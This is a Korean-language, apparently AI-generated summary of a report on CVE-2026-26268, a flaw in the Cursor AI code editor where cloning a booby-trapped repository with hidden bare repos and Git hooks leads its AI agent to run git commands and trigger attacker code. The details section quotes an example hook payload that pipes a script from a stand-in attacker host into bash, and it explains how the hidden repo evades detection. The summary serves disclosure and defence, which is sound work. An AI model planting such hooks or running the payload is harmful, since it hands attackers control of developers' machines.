AI 요약
최근 AI 기반 코드 편집기인 'Cursor'에서 사용자가 악성 리포지토리를 복제(clone)하기만 해도 PC 제어권을 빼앗길 수 있는 심각한 보안 결함이 보고되었습니다. CVE-2026-26268로 명명된 이 취약점은 CVSS 점수 9.9를 기록하며 최고 수준의 위험성을 경고하고 있습니다. 문제의 핵심은 Cursor의 AI 에이전트가 효율적인 코드 분석을 위해 사용자의 명시적 승인 없이 자율적으로 Git 작업을 수행하는 '편의 기능'에 있습니다. 공격자는 일반적인 리포지토리 내부에 악성 스크립트가 포함된 '베어 리포지토리'와 Git Hook을 숨겨두어, AI가 이를 분석하는 순간 자동으로 코드가 실행되도록 설계했습니다. 이는 AI 에이전트의 자율성이 오히려 보안의 최대 약점으로 작용할 수 있음을 보여주는 사례로, 개발자들의 각별한 주의가 필요합니다.
핵심 인사이트
- 취약점 공식 명칭 및 위험도: CVE-2026-26268로 명명되었으며, 위험 등급은 만점에 가까운 CVSS 9.9입니다.
- 영향 범위 및 패치 정보: Cursor 2.4 이전의 모든 버전이 영향을 받으며, 2026년 2월에 수정된 Cursor 2.5 버전에서 보안 강화가 이루어졌습니다.
- 공개 일정: 취약점의 상세 내용은 2026년 4월 28일에 일반에 공개되었습니다.
- 공격 난이도: 별도의 인증이나 복잡한 조작 없이, 단순히 리포지토리를 git clone 하는 것만으로 공격이 성립되어 매우 위험합니다.
주요 디테일
- 공격 기법(Git Hooks 활용): Git의 정규 기능인 'Git Hooks'를 악용하여 특정 이벤트(commit, checkout 등) 발생 시 공격자의 스크립트(
curl -s http://attacker.com/steal.sh | bash)가 자동 실행되도록 구성합니다. - 베어 리포지토리 매립: 공격자는
malicious-repo/내부에.hidden-bare-repo/와 같은 숨겨진 리포지토리를 배치하고 그 안에 악성 Hooks를 심어 탐지를 회피합니다. - AI 에이전트의 역할: 기존 IDE와 달리 Cursor의 AI 에이전트가 리포지토리를 분석하는 과정에서 스스로
git checkout등을 실행하여 숨겨진 트리거를 밟게 됩니다. - 기술적 대응책: Cursor 2.5 버전에서는 샌드박스 환경을 도입하여
.git설정 파일에 대한 부적절한 쓰기 및 접근을 방지하는 권한 제어를 구현했습니다. - 수동 점검 방법: 이미 클론한 리포지토리가 있다면
.git/hooks/pre-commit등의 파일을 열어 의심스러운 코드가 있는지 확인해야 합니다.
향후 전망
- 이번 사건은 AI 에이전트가 자율적으로 판단하고 행동할수록 보안 공격 표면(Attack Surface)이 확대된다는 점을 시사하며, Claude Code 등 유사한 설계를 가진 AI 도구 전반에 대한 보안 점검으로 이어질 전망입니다.